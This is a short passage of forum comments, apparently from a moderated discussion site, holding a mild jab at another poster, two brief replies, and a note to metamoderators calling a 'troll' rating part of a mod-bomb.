Trying using the sense your mama tried so hard to beat into you.

x-celent

[Arnok]

of course it is !

note to metamods

[bill_mcgonigle]

the 'troll' on this one was part of a mod-bomb.